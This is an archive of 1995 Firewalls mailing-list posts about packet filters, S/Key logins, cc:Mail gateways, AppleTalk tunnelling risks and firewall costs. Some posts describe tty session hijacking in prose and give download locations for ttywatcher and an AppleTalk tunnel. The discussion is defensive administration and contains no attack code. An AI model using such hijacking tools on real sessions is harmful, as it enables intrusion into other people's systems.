TCP (v8.1.1-dmr001); Thu, 3 Aug 95 14:32:11 MST Received: by smtpgw.pccw.petro-canada.ca with Microsoft Mail id <302145BC@smtpgw.pccw.petro-canada.ca>; Thu, 03 Aug 95 14:55:08 PDT From: "Ferreira, Ben 296-4158" To: firewalls Subject: Re: IPWatcher Date: Thu, 03 Aug 95 14:43:00 PDT Message-ID: <302145BC@smtpgw.pccw.petro-canada.ca> Encoding: 8 TEXT X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Does anyone know how much they want for this package? ---------- . Well ipwatcher is comercial so that stops most of the public from getting . it. And the same people that made ipwatcher also made a freeware . ttywatcher which applies the same principles as ipwatcher but just with . tty monitoring/stealing From firewalls-owner Thu Aug 3 14:48:37 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA11383 for firewalls-outgoing; Thu, 3 Aug 1995 12:01:31 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA11339 for ; Thu, 3 Aug 1995 12:01:24 -0700 Received: from mycroft.greatcircle.com(198.102.244.35) by miles via smap (V1.3) id sma011325; Thu Aug 3 12:00:34 1995 Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-950602) id LAA23851; Thu, 3 Aug 1995 11:54:44 -0700 Received: from skypoint.com(199.86.32.7) by mycroft via smap (V1.3mjr) id sma023849; Thu Aug 3 11:54:41 1995 Received: from [199.86.33.24] by skypoint.com with smtp (Smail3.1.28.1 #6) id m0se5TM-0005DJC; Thu, 3 Aug 95 13:58 CDT X-Sender: ray@skypoint.com Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Thu, 3 Aug 1995 14:01:05 -0500 To: firewalls@greatcircle.com From: kaplan@bpa.arizona.edu (Ray Kaplan) Subject: Re: multilevel security in firewalls Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Bob writes: >Ray sezz... >> Introdution: This begins my 13th year of independent security consulting >> with an emphasis on finding, reporting, and helping to fix vulnerabilities >> in large (usually multi-vendor, multi-protocol, multi-national) networks. >> I call my specialty assessment rather than audit since I don't have a check >> list and I don't have a green eye shade like some auditors ;) While I have >> to wear suits most of the time, I delight in being under a baseball cap in >> matter-of-fact conversations with technical and management types about how >> things in their infrastructures really work. >Bravo! Thanks. Hold the applause and send money ;) Seriously, anyone else out there in firewalls-land having any luck with talking to management about the risks and getting them to act on 'em? >> I've just left CyberSAFE (the dominate supplier of commercial Kerberos) and >> am rebuilding my consulting practice. >Bravo again. Glad to see that, like some of the rest of us >unemployables that if you believe that you are the only person who can >live your life, and that you will not live forever then the best way to >do this is to do it your way. :) Gee, we could even have a sing-song of that song "I Idid it My Way" ;) Say, do creditors accept independence in lieu of $? ;) Back to being serious - I'd like to hear from other independents in this firewalls game. Ahh, maybee I can take out a personal ad under the "Battered, independent security consultant seeking" colum heading ;) >> This is important from two >> standpoints: 1) My biases are based in the ugly experience of helping >> organizations prepare for the deployment of serious secuity. 2) After over >> a decade of this security stuff, I'm covered with bruises and scars. All I >> have is my experience to offer. While there are some facts to rely on, >> most of this security stuff is a game of risk assumption. There is no 100% >> solution. Even the best run, stand-alone A1 system can be compromised. >Indeed. So, I wonder if we (the collective and electronically assembled masses here in firewalls-land) would benifit from collecting / catalogueing these business/technical stories and make them available in a volume entitled "Horror stories from the front line?" I'm launching a small, bootsrtap electronic publishing effort - so if anyone has firewall-related business/technical stories that they want to share - pls send them along. Maybe its time we just documented what is going on? >> This is not a thinly veiled attempt at commercialism. In rebuilding my >> consulting practice, I'm revisiting the basics of what I am, how I think >> about things, and what I want to concentrate on. This particular thread >> strikes chords in all of these areas - and, it seems to be one that could >> stand some focus and illucidation. >Nothing wrong with commercialism. I've told Marcus I don't know how >many times that "technology is great and wonderful, but, only selling >it creates wealth. He is now about to find that out. I guess Marcus is independent now? Getting past the cash flow issues, I wonder if any other firewallers have security marketing war stories? After a ovver a decade of watching me and my friend hit the wall trying to make a dent, I'm hardened to the tough sell aspects of it all. Maybe the proposed volume of war stories should be advertised in the Wall Street Journal - "Dear Commercial Enterprise, we the assembled masses of bruised and battered make-a-profit-and-have-fun-in-security types want to tell you about this problem we have..." Then, maybe we'd all attract a marketing / PR type who could package it in a way that it would sell? Only half kidding. RayK 8) - Better Living Through Authentication - I usually only speak for myself Ray Kaplan - Security Services - P.O. Box 23210 - Richfield, MN 55423 Phone / FAX (612) 861-7198 - currently: kaplan@bpa.arizona.edu But, as with everything else in life, this will change. RayK 8) - Better Living Through Authentication - I usually only speak for myself Ray Kaplan - Security Services - P.O. Box 23210 - Richfield, MN 55423 Phone / FAX (612) 861-7198 - currently: kaplan@bpa.arizona.edu But, as with everything else in life, this will change. From firewalls-owner Thu Aug 3 15:00:21 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA15640 for firewalls-outgoing; Thu, 3 Aug 1995 13:58:51 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA15590 for ; Thu, 3 Aug 1995 13:58:43 -0700 Received: from firewall.cwa.com(192.100.4.193) by miles via smap (V1.3) id sma015528; Thu Aug 3 13:57:45 1995 Received: by firewall.cwa.com (4.1/CWA-SMI-4.1) id AA01030; Thu, 3 Aug 95 14:02:12 PDT Received: from cwa.com(192.100.4.14) by firewall via smap (V1.3mjr) id sma001026; Thu Aug 3 14:01:45 1995 Received: from lassen by cwa.com (4.1/CWA-PSI-SMI-1.0) id AA01716; Thu, 3 Aug 95 13:54:17 PDT Message-Id: <9508032054.AA01716@cwa.com> Comments: Authenticated sender is From: "Dan Murphy" Organization: CWA Communication Products, Inc. To: firewalls@greatcircle.com Date: Wed, 2 Aug 1995 11:19:10 -800 Subject: Sparc2 screening router SW Reply-To: dmurphy@cwa.com Priority: normal X-Mailer: Pegasus Mail for Windows (v2.01) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, all: I'm looking into the feasibility of converting an idle Sparc-2 with three Ethernet interfaces into a screening router connecting three local nets, with a minimum infusion of additional cash or hardware. I've picked up the ipfilter package from Darren Reed, which looks to be exactly what I need, and the last version of screend (dated April 1990). Your experiences with either of these packages, and/or pointers to other possible solutions, would be appreciated. Thanks, +----------------------------------------------------------------------+ | Dan Murphy | CWA | Los Gatos, Calif | 408-358-1529 | dmurphy@cwa.com | +----------------------------------------------------------------------+ From firewalls-owner Thu Aug 3 15:14:19 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA15641 for firewalls-outgoing; Thu, 3 Aug 1995 13:58:52 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA15595 for ; Thu, 3 Aug 1995 13:58:43 -0700 Received: from firewall.cwa.com(192.100.4.193) by miles via smap (V1.3) id sma015529; Thu Aug 3 13:57:43 1995 Received: by firewall.cwa.com (4.1/CWA-SMI-4.1) id AA01031; Thu, 3 Aug 95 14:02:12 PDT Received: from cwa.com(192.100.4.14) by firewall via smap (V1.3mjr) id sma001027; Thu Aug 3 14:01:46 1995 Received: from by cwa.com (4.1/CWA-PSI-SMI-1.0) id AB01716; Thu, 3 Aug 95 13:54:19 PDT Message-Id: <9508032054.AB01716@cwa.com> Comments: Authenticated sender is From: "Dan Murphy" Organization: CWA Communication Products, Inc. To: firewalls@greatcircle.com Date: Thu, 3 Aug 1995 13:57:33 -800 Subject: Sparc2 as a 3-way packet filter? Reply-To: dmurphy@cwa.com Priority: normal X-Mailer: Pegasus Mail for Windows (v2.01) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, all: I'm looking into converting an idle Sparc-2 with 3 Ethernet interfaces into a packet-filtering firewall/router connecting 3 local nets for IP traffic only. Buying more hardware is not an option. The 3 networks are: a DMZ with our Internet link, another router and a bastion host; a buffer net with routers to multiple mutually suspicious clients resources shared between the client and our engineers (i.e., NFS servers); and the internal company LAN with <50 heterogeneous hosts. No traffic will pass directly from one external net to another, or to the internal net, only to servers in the buffer net or the DMZ bastion host. We will control all the "edge" routers on the buffer and DMZ nets. I've picked up the ipfilter package from Darren Reed, which looks to be pretty much what I think I need, and the newest version of screend I was able to find (dated April 1990). Any experiences with either of these two packages, or pointers to other SW solutions, would be appreciated. Thanks, +----------------------------------------------------------------------+ | Dan Murphy | CWA | Los Gatos, Calif | 408-358-1529 | dmurphy@cwa.com | +----------------------------------------------------------------------+ From firewalls-owner Thu Aug 3 15:40:54 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA20641 for firewalls-outgoing; Thu, 3 Aug 1995 15:21:14 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA20612 for ; Thu, 3 Aug 1995 15:21:08 -0700 Received: from eagle.real.com(199.97.122.1) by miles via smap (V1.3) id sma020603; Thu Aug 3 15:21:02 1995 Date: Thu, 3 Aug 1995 22:20:26 GMT From: bret@real.com (Bret McDanel) Received: by real.com (8.6.12/3.2.012693-Realistic Technologies Inc); id WAA29636 for firewalls@greatcircle.com; Thu, 3 Aug 1995 22:20:26 GMT Message-Id: <199508032220.WAA29636@real.com> To: firewalls@greatcircle.com Subject: Re: Where are the known "den of thieves" sites ? X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > >Being a newbie I wondered who are these known sites ? Who knows about them ? > >Where can I get that info ? I've never seen an alert that says such and > >such site or ip address is a known source of trouble so who is passing this > >info along ? Are there lists ? > Such lists are really pointless.. If someone is black listed on your machine and they want in, they will either spoof, or more likely break into another machine to get to you.. The sites would get outdated really fast.. And once a site is black listed (like every isp in existance) can it ever get off that list? And who would certify that it should come off? There are real problems with that idea.. As soon as 1 site gets blacklisted 10 more would need to be.. Also, the really good people dont have known machines :) on a side note, didnt we go through this same exact thread about 1 or so years ago, and it started a whole lot of mail and pretty much trashed the list? > I always found cert.org to be constantly involved in computer security > breakins. > > :) > > sorry, > Mark > heh From firewalls-owner Thu Aug 3 16:10:06 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA20815 for firewalls-outgoing; Thu, 3 Aug 1995 15:25:15 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA20794 for ; Thu, 3 Aug 1995 15:25:11 -0700 Received: from di.disclosure.com(205.156.194.1) by miles via smap (V1.3) id sma020789; Thu Aug 3 15:25:04 1995 Received: by Disclosure.COM (4.1/SMI-4.1) id AA23751; Thu, 3 Aug 95 18:25:11 EDT Date: Thu, 3 Aug 1995 18:25:10 -0400 (EDT) From: Scott Barman To: Darren Reed Cc: Firewalls Mailing List Subject: Re: preventing password accidents. In-Reply-To: <199508031550.IAA22775@mycroft.GreatCircle.COM> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Fri, 4 Aug 1995, Darren Reed wrote: > What I'd like to propose is that firewalls and other systems which > require the use of reuseable passwords take preventative measures, > to stop a potentially harmful/critical password being entered across > an insecure medium. ie if it sees the username "root" given to the > "login:" prompt, it drops the connection immeadiately with no > "Password:" prompt sent back. And it does the same for anyone who has > a trusted account (ie group wheel, etc). You may wish to alter this > policy for ssh/STEL/deslogin accesses, as appropriate. Interesting thought, although I figure S/Key or some other one-time password mechanism would be OK. Or shouldn't it reject the root login anyway? Even running fwtk and with the hacked S/Key it comes with, you can't log on as root from a network connection. I set it up on a Sun and removed the word "secure" from *every* entry in the ttytab file. No root logins regardless! And the other question I have is what do you do about su? Do you watch it the same way? > What I'm aiming to solve here is the "oh, just let me login, oops, > forgot to use skey, let me retype that" and similar, where although the > password may not necessarily give an outsider access, if they snoop'd > that password, it's a little bit easier. If they're using S/Key, then how is this a problem anyway? They enter the one-time password and it's invalid for the next login. I don't see the problem. > If something already has this behaviour, please point me at it, but as > far as I am aware, nothing will stop you entering a password if you > have already entered a username, especially if it is valid. And under Unix, you are prompted for a password anyway, even if the username is not valid. scott barman -- scott barman DISCLAIMER: I speak to anyone who will listen, scott@disclosure.com and I speak only for myself. barman@ix.netcom.com "Micro$oft and Windoze/NT will be the cause of the de-evolution of network security just as the original PC and BASIC was the cause of the de-evolution of programming." From firewalls-owner Thu Aug 3 16:35:07 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA23028 for firewalls-outgoing; Thu, 3 Aug 1995 16:05:58 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA23001 for ; Thu, 3 Aug 1995 16:05:54 -0700 Received: from commsun.its.csiro.au(152.83.8.2) by miles via smap (V1.3) id sma022970; Thu Aug 3 16:04:52 1995 Received: (from fit106@localhost) by commsun.its.csiro.au (8.6.10/8.6.10) id JAA14481; Fri, 4 Aug 1995 09:00:07 +1000 Date: Fri, 4 Aug 1995 09:00:05 +1000 (EST) From: Kent Fitch To: Michael Brennen cc: Darren Reed , Firewalls Mailing List Subject: Re: preventing password accidents. In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Thu, 3 Aug 1995, Michael Brennen wrote: > On Fri, 4 Aug 1995, Darren Reed wrote: > > > What I'd like to propose is that firewalls and other systems which > > require the use of reuseable passwords take preventative measures, > > to stop a potentially harmful/critical password being entered across > > an insecure medium. >> > A properly configured S/Key system will prevent this. The trick is the > /etc/skey.access file to require S/Key from non-local sites. I have a > particular login that does not require S/Key locally, but will not accept > the reusable password remotely. S/Key is required for remote login on > that ID. > > Nothing prevents me from *trying* to enter the password from a remote site > and having it sniffed, but it won't be accepted. A short between the > headphones is a different problem entirely. > > The combination of tcp_wrappers, S/Key and logdaemon is a rather > configurable way to tighten access. The logdaemon package in addition > allows configurable use of login names. I have root completely disabled > from all but the local console, for example. Groups can be controlled in > similar ways. We are currently implementing/testing a PGP add-on to the logdaemon suite - like the S/key component described above, it reads a file which describes the conditions under which only a PGP response will be accepted. Now, the PGP response is really just the user signing a plain text challenge, and ascii-armouring it. Hence, we always expect the response to start with the string "-----BEGIN PGP SIGNED MESSAGE-----..." I have been thinking of immediately dropping the connection once it is apparent that the incoming string might be a password, and not the start of the signed response - it does seem a bit aggressive and user unfriendly, however. Also, as users typically type passwords quite fast, maybe most of the password will be on the net before we reset the connection! Kent Fitch Ph: +61 6 276 6711 ITSB CSIRO Canberra Australia kent.fitch@its.csiro.au "It is not enough to succeed. Others must fail." - Gore Vidal From firewalls-owner Thu Aug 3 19:09:04 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA29145 for firewalls-outgoing; Thu, 3 Aug 1995 18:37:37 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA29135 for ; Thu, 3 Aug 1995 18:37:35 -0700 Received: from neptune.tis.com(192.94.214.96) by miles via smap (V1.3) id sma029131; Thu Aug 3 18:37:34 1995 Received: from relay.tis.com by neptune.TIS.COM id aa03914; 3 Aug 95 21:35 EDT Received: from sol.tis.com(192.33.112.100) by relay.tis.com via smap (g3.0.1) id xma012018; Thu, 3 Aug 95 21:26:53 -0400 Received: from sol.tis.com by tis.com (4.1/SUN-5.64) id AA02434; Thu, 3 Aug 95 21:33:54 EDT Message-Id: <9508040133.AA02434@tis.com> To: Darren Reed Cc: Firewalls Mailing List Subject: Re: preventing password accidents. In-Reply-To: Your message of "Fri, 04 Aug 95 01:53:01 +1000." <199508031550.IAA22775@mycroft.GreatCircle.COM> Date: Thu, 03 Aug 95 21:33:53 -0400 From: Rick Murphy Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >What I'd like to propose is that firewalls and other systems which >require the use of reuseable passwords take preventative measures, >to stop a potentially harmful/critical password being entered across >an insecure medium. ie if it sees the username "root" given to the >"login:" prompt, it drops the connection immeadiately with no >"Password:" prompt sent back. The problem with this approach is that you've given a potential cracker some information - cracking root isn't helpful. You've actually made their job easier. What you want to do with any net access attempt to "root" is to set off loud alarms - and ignore the access - but avoid looking to the person trying the account like you know what they're doing. Let them waste their time while you try to track them back to the source. -Rick From firewalls-owner Thu Aug 3 19:31:51 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA29400 for firewalls-outgoing; Thu, 3 Aug 1995 18:57:38 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA29384 for ; Thu, 3 Aug 1995 18:57:35 -0700 Received: from ingress.com(199.171.57.2) by miles via smap (V1.3) id sma029380; Thu Aug 3 18:57:23 1995 Received: by ingress.com (4.1/SMI-4.1) id AA05432; Thu, 3 Aug 95 21:49:20 EDT Date: Thu, 3 Aug 1995 21:49:19 -0400 (EDT) From: Charles Kaplan To: dannyc@gmap.leeds.ac.uk Cc: firewalls@greatcircle.com Subject: cc:mail // smap // sendmail Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk To very briefly help you out here (sorry, I am swamped today), you would have effectivly 2 approaches to use. 1) All external email through the firewall, and then to either the approprate unix host, or the smtp-gw 2) All users on unix systems get email via the firewalls smapd, you configure the cc:mail smtp-gw with 2 interfaces, one inside, and one out. I tend to recomend 1, because it is single email point of failure if you will, but 2 is a very viable alternative. In 2 if you firewall is down/off, you can still continue to get email into your cc:mail users. You are placing some degree of faith in Lotus however. While in 2 interface mode there is only IPX on the internal side, and NO IP (outside interface only) there is little to say the gateway couldn't become compromised, and an IPX sniffer loaded, to gather who knows what. With regards to configuring the CC:mail smtp-gw, you can set it up to forward all email to an external machine for delivery (like your firewall for example), and then on your firewall setup aliases like the following: \/ hostname of the gateway machine cbk:cbk_at_postofficename@ccsmtpgw.company.com ^^name of the ccmail po BTW, you have to setup outbound aliases on the ccmail-gw. You have to force ccmail to rewrite the address from cbk@ccsmtpgw.company.com to cbk@company.com. Just define all this in a file on the gateway (I forget the name of it off the top of my head). If in doubt, RTM. While it makes no mention of how to setup the gateway for use like above, it does actually tell you how to configure it. Most annoying. Remember to run CC-Backup however, as you can nolonger backup the mail database with a standard software package (the mail database is held open by the smtp-gw) Since this only vaguely relates to firewalls however (the theoritical 1 interface or 2 issue) I am done babbling. --- Charles B. Kaplan Vice President Ingress Communications, Inc. Enterprise Networking Empire ST BLD, STE 3406, NY, NY 10118 cbk@ingress.com 45 Grant Avenue, Norwood, MA 02062 Networking / Internetworking / Security / Object Technology NT / UNIX / Novell From firewalls-owner Thu Aug 3 19:37:01 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA29413 for firewalls-outgoing; Thu, 3 Aug 1995 18:58:38 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA29405 for ; Thu, 3 Aug 1995 18:58:35 -0700 Message-Id: <199508040158.SAA29405@miles.greatcircle.com> Received: from cheops.anu.edu.au(150.203.76.24) by miles via smap (V1.3) id sma029401; Thu Aug 3 18:57:50 1995 Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA107880988; Fri, 4 Aug 1995 11:49:48 +1000 From: Darren Reed Subject: Re: preventing password accidents. To: mbrennen@puddytat.intecom.com (Michael Brennen) Date: Fri, 4 Aug 1995 11:49:48 +1000 (EST) Cc: Firewalls@GreatCircle.COM (Firewalls Mailing List) In-Reply-To: from "Michael Brennen" at Aug 3, 95 03:36:58 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 2109 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In some mail from Michael Brennen, sie said: > > > On Fri, 4 Aug 1995, Darren Reed wrote: > > > What I'd like to propose is that firewalls and other systems which > > require the use of reuseable passwords take preventative measures, > > to stop a potentially harmful/critical password being entered across > > an insecure medium. ie if it sees the username "root" given to the > > "login:" prompt, it drops the connection immeadiately with no > > "Password:" prompt sent back. And it does the same for anyone who has > > a trusted account (ie group wheel, etc). You may wish to alter this > > policy for ssh/STEL/deslogin accesses, as appropriate. [...] > A properly configured S/Key system will prevent this. The trick is the > /etc/skey.access file to require S/Key from non-local sites. I have a > particular login that does not require S/Key locally, but will not accept > the reusable password remotely. S/Key is required for remote login on > that ID. No, that is not want I want to solve and I'm aware that S/key can be setup in this fashion (I use it). > Nothing prevents me from *trying* to enter the password from a remote site > and having it sniffed, but it won't be accepted. A short between the > headphones is a different problem entirely. This is what I am trying to address - the incorrect password being entered. I'm well aware that S/key can make use of a normal password ineffective at the login prompt. What I'm addressing and attempting to resolve here is people attempting to use reuseable passwords where they either won't work anyway or we don't want them being entered. What I'm saying is that over an untrusted connection, it is not acceptable to send back the "Password:" prompt if the username given at the "Login:" prompt is for a trusted account, and give the user the chance to enter secret password, even if it won't be effective. Yes, su is a similar case, although making it 4750, root.wheel and imposing restrictions on where group wheel can login from goes some way to solving it. S/key solves what is effective, but not what gets entered. darren From firewalls-owner Thu Aug 3 21:00:12 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id UAA04092 for firewalls-outgoing; Thu, 3 Aug 1995 20:33:23 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id UAA04053 for ; Thu, 3 Aug 1995 20:33:17 -0700 Received: from comm.cpd.tandem.com(130.252.12.3) by miles via smap (V1.3) id sma004004; Thu Aug 3 20:32:21 1995 Received: by comm.tandem.com (4.13/4.5) id AA825; 3 Aug 95 20:31:10 +1700 Date: 3 Aug 95 16:38:00 +1700 From: MAHAJAN_VIVEK@tandem.com Message-Id: <199508032031.AA825@comm.tandem.com> To: firewalls@greatcircle.com Subject: Cost of implementing a firewall Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hello: For those of you who have implemented a commercial firewall package I would appreciate if you could share your experiences as to how much resources does it take to administer it, hardware costs, and looking back what do you think you think you ended up paying (including hidden costs and manpower.)? According to the vendors it takes very little to administer it but I would really like to get your viewpoint - especially when I am talking about thousands of users. Regards Vivek From firewalls-owner Thu Aug 3 21:30:04 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id VAA05717 for firewalls-outgoing; Thu, 3 Aug 1995 21:17:38 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id VAA05685 for ; Thu, 3 Aug 1995 21:17:34 -0700 Received: from gateway.cpd.tandem.com(130.252.12.3) by miles via smap (V1.3) id sma005675; Thu Aug 3 21:17:09 1995 Received: by comm.tandem.com (4.13/4.5) id AA9017; 3 Aug 95 21:16:03 +1700 Date: 3 Aug 95 15:39:00 +1700 From: MAHAJAN_VIVEK@tandem.com Message-Id: <199508032116.AA9017@comm.tandem.com> To: firewalls@greatcircle.com Subject: Re: IPWatcher Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Does anyone know where the freeware ttywatcher is available? Vivek ------------ ORIGINAL ATTACHMENT -------- SENT 08-03-95 FROM SMTPGATE (BFERREIR@pchardy.petro-canada.ca) Does anyone know how much they want for this package? ---------- . Well ipwatcher is comercial so that stops most of the public from getting . it. And the same people that made ipwatcher also made a freeware . ttywatcher which applies the same principles as ipwatcher but just with . tty monitoring/stealing From firewalls-owner Thu Aug 3 21:44:46 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id VAA05336 for firewalls-outgoing; Thu, 3 Aug 1995 21:01:36 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id VAA05297 for ; Thu, 3 Aug 1995 21:01:31 -0700 Received: from boombox.cyber.com.au(203.7.155.33) by miles via smap (V1.3) id sma005279; Thu Aug 3 21:01:01 1995 Received: (from root@localhost) by boombox.cyber.com.au (8.6.8/8.6.6) with UUCP id NAA20456; Fri, 4 Aug 1995 13:58:43 +1000 Received: (from mikec@localhost) by phyto.cyber.com.au (8.6.9/8.6.9) id NAA04818; Fri, 4 Aug 1995 13:53:33 +1000 From: Mike Ciavarella Message-Id: <199508040353.NAA04818@phyto.cyber.com.au> Subject: Re: appletalk and ipx dangers? To: saltzman@shore.net (Mark Saltzman) Date: Fri, 4 Aug 1995 13:53:32 +1000 (EST) Cc: firewalls@greatcircle.com In-Reply-To: from "Mark Saltzman" at Aug 2, 95 05:31:41 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 2988 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Does anyone see any danger in allowing ipx and appletalk traffic to be > routed through my firewall? I have ip routing disabled for obvious > reasons, but I want to allow ipx and appletalk routing through the > firewall. We have a remote access server setup on the "unsafe" side of the > firewall which allows users ip connectivity to get out to the internet, and > appletalk and ipx to get in to the corporate network. If my internet > router is not routing appletalk or ipx then I'm safe, right......? > thanks for any info, Hi Mark, I'm a little unsure as to your configuration, but it sounds like you have something like this: -+-----IP----+- -+-----------+-----------------+- | | | | | | | | | | ISP_rtr Internet_Rtr Firewall Access Server | | | | | | Jane Corporate John Passing protocols through your firewall without processing any deeper than the protocol type field, will open you up to attacks by encapsulation. If you can find a mac program called "Trawl", you'll be able to the different boxes on your Appletalk network. You may see entitites of type *:IPGATEWAY on your network - these provide an encapsulation service for IP packets (eg. on a Multigate). Some possibilties: (1) Make sure that your internet_rtr absolutely positively doesn't route protocols other than IP. (2) If your access server or multigate-equivalent allocates IP addresses in a range, disallow incoming IP to that range on your internet router. (your mac users may need to use a ftp proxy..) (3) You may be able to filter on NBP type in your firewall (assuming that it understands Appletalk). This is sometimes done to stop printers appearing in the wrong zone across larger networks :-) Disallowing anything other than Appleshare servers and printers should reduce the risk of an attack using IP-in-Appletalk packets from the Access server. As far as attack from the Internet side goes, if you allow unrestricted outgoing IP from the Access server, then one of your Access Server users (eg. John) might be able to fire up an Appletalk tunnel from behind the Access server to anyone on the outside, providing access to your Appletalk network. See ftp://munnari.oz.au/multigate/ for source for an Appletalk tunnel [munnari is a busy box - be gentle]. mike -- -- ------- X ---------------------- mikec@cyber.com.au ---------------- (D / \ C) information...it's all yours...it's all mine...you just r>_% =--{] have to find the time..flick between realities, there's /& z\ more to this than anything that you or I can see.... ///\ /\\\ ........Zeroes and ones will take us there. / ^ ------ \ \\ ----- ddmib-3-1-3+2-0+13nk.-6+7-14l-12@m+2e-6.+19 ----- From firewalls-owner Fri Aug 4 00:01:53 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id XAA09635 for firewalls-outgoing; Thu, 3 Aug 1995 23:58:47 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id XAA09602 for ; Thu, 3 Aug 1995 23:58:42 -0700 Received: from yarrina.connect.com.au(192.189.54.17) by miles via smap (V1.3) id sma009593; Thu Aug 3 23:58:40 1995 Received: (from root@localhost) by yarrina.connect.com.au with UUCP id QAA18944 (8.6.12/IDA-1.6 for Firewalls@GreatCircle.COM); Fri, 4 Aug 1995 16:57:27 +1000 Received: by junkers.lochard.com.au id AA29590 (5.65c/IDA-1.5 for Firewalls@GreatCircle.COM); Fri, 4 Aug 1995 16:18:51 +1100 From: Mark Message-Id: <199508040518.AA29590@junkers.lochard.com.au> Subject: Re: preventing password accidents. To: Firewalls@GreatCircle.COM Date: Fri, 4 Aug 1995 16:18:50 +1000 (E ) Content-Type: text Content-Length: 827 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >If they're using S/Key, then how is this a problem anyway? They enter >the one-time password and it's invalid for the next login. I don't see >the problem. Consider session hijacking (shadowing is a more accurate description). An intruder can easily take your session, send in a binary, su and run it and give you back your session in less than five seconds. Usually passwds are irrelevant anyway as there are just so many root holes that once they are on the machine it is gone. If you are targetted by someone that is suitably equipped all you will see is a net freeze for 5 seconds whilst they followed your legal connection in and compromised you. Once they are on a machine you enter another from it's over. Thirty seconds after that you wont find the slightest trace of them. Welcome to the internet. Cheers, Mark From firewalls-owner Fri Aug 4 01:30:32 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id BAA11703 for firewalls-outgoing; Fri, 4 Aug 1995 01:04:53 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id BAA11688 for ; Fri, 4 Aug 1995 01:04:50 -0700 From: ppi@rpdata.com.au Received: from rpdata.client.uq.edu.au(130.102.169.12) by miles via smap (V1.3) id sma011680; Fri Aug 4 01:04:03 1995 Received: from rpdata.com.au by rpdata.rpdata.com.au; Fri, 4 Aug 95 18:02 EST Received: from dbadmin by sydney.rpdata.com.au with SMTP (5.65/1.2-eef) id AA02280; Fri, 4 Aug 95 17:48:39 -1000 Content-Length: 572 Content-Type: text Message-Id: <9508050348.AA02280@sydney.rpdata.com.au> Comments: Authenticated sender is >From: rpdata.com.au!ppi ("Phil Pierotti - Database Administrator") Organization: RP Data Pty Ltd To: firewalls@GreatCircle.COM Date: Fri, 4 Aug 1995 18:06:01 +1000 Subject: Re: IPWatcher (Where to get it) Reply-To: ppi@rpdata.com.au Priority: normal X-Mailer: Pegasus Mail for Windows (v2.01) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk here it is, for those who want it ftp://coast.cs.purdue.edu/pub/tools/unix/ttywatcher ------------------------------------------------------------ Be Realistic: Plan for a Miracle. Bhagwan Shree Rajneesh. ------------------------------------------------------------ Phil Pierotti ppi@rpdata.com.au Systems Administrator RP Data Pty Ltd Phone +61 2 893 8255 Sydney, Australia Fax +61 2 893 8663 ============================================================= From firewalls-owner Fri Aug 4 04:30:03 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id EAA15510 for firewalls-outgoing; Fri, 4 Aug 1995 04:26:34 -0700 Received: 